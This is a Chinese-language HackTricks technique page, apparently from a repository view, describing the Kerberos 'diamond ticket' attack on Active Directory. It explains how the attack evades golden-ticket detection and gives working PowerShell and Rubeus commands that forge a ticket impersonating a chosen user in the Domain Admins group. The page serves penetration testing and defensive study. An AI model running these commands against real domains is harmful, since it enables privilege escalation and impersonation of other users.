hacktricks/windows-hardening/active-directory-methodology/diamond-ticket.md
2023-08-03 19:12:22 +00:00

4.7 KiB
Raw Blame History

钻石票据

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

钻石票据

就像黄金票据一样,钻石票据是一种可以用来以任何用户身份访问任何服务的TGT。黄金票据完全是离线伪造的使用该域的krbtgt哈希进行加密然后传递到登录会话中供使用。因为域控制器不会跟踪它们或它合法发行的TGT所以它们会欣然接受使用其自己krbtgt哈希加密的TGT。

检测黄金票据使用的两种常见技术:

  • 查找没有相应AS-REQ的TGS-REQ。
  • 查找具有荒谬值的TGT例如Mimikatz的默认10年有效期。

钻石票据是通过修改由DC发行的合法TGT的字段来创建的。这是通过请求一个TGT使用域的krbtgt哈希解密它,修改票据的所需字段,然后重新加密它来实现的。这克服了黄金票据的两个前述缺点,因为:

  • TGS-REQ将有一个前置的AS-REQ。
  • TGT是由DC发行的这意味着它将具有来自域的Kerberos策略的所有正确详细信息。即使在黄金票据中可以准确伪造这些信息但这更复杂且容易出错。
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.

\

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥